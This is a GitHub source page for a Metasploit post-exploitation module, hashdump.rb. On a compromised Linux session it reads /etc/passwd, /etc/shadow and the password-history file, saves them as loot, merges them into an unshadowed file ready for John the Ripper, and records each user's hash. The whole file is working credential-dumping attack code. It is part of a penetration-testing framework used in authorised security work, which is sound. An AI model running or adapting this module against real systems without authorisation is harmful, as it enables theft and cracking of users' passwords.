-
Notifications
You must be signed in to change notification settings - Fork 14k
/
hashdump.rb
97 lines (81 loc) · 2.88 KB
/
hashdump.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Linux::Priv
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Linux Gather Dump Password Hashes for Linux Systems',
'Description' => %q{ Post Module to dump the password hashes for all users on a Linux System},
'License' => MSF_LICENSE,
'Author' => ['Carlos Perez <carlos_perez[at]darkoperator.com>'],
'Platform' => ['linux'],
'SessionTypes' => ['shell', 'meterpreter']
)
)
end
# Run Method for when run command is issued
def run
unless readable?('/etc/shadow')
fail_with Failure::NoAccess, 'Shadow file must be readable in order to dump hashes'
end
passwd_file = read_file('/etc/passwd')
unless passwd_file.nil?
p = store_loot('linux.passwd', 'text/plain', session, passwd_file, 'passwd.tx', 'Linux Passwd File')
vprint_good("passwd saved in: #{p}")
end
shadow_file = read_file('/etc/shadow')
unless shadow_file.nil?
p = store_loot('linux.shadow', 'text/plain', session, shadow_file, 'shadow.tx', 'Linux Password Shadow File')
vprint_good("Shadow saved in: #{p}")
end
opasswd_file = read_file('/etc/security/opasswd')
unless opasswd_file.nil?
p = store_loot('linux.passwd.history', 'text/plain', session, opasswd_file, 'opasswd.tx', 'Linux Passwd History File')
vprint_good("opasswd saved in: #{p}")
end
# Unshadow the files
john_file = unshadow(passwd_file.to_s, shadow_file.to_s)
return if john_file == ''
john_file.each_line do |l|
hash_parts = l.split(':')
jtr_format = Metasploit::Framework::Hashes.identify_hash hash_parts[1]
if jtr_format.empty? # overide the default
jtr_format = 'des,bsdi,crypt'
end
credential_data = {
jtr_format: jtr_format,
origin_type: :session,
post_reference_name: refname,
private_type: :nonreplayable_hash,
private_data: hash_parts[1],
session_id: session_db_id,
username: hash_parts[0],
workspace_id: myworkspace_id
}
create_credential(credential_data)
print_good(l.chomp)
end
# Save passwd file
upasswd = store_loot('linux.hashes', 'text/plain', session, john_file, 'unshadowed_passwd.pwd', 'Linux Unshadowed Password File')
print_good("Unshadowed Password File: #{upasswd}")
end
def unshadow(pf, sf)
unshadowed = ''
sf.each_line do |sl|
pass = sl.scan(/^\w*:([^:]*)/).join
next if pass == '*'
next if pass == '!'
user = sl.scan(/(^\w*):/).join
pf.each_line do |pl|
next unless pl.match(/^#{user}:/)
unshadowed << pl.gsub(/:x:/, ":#{pass}:")
end
end
unshadowed
end
end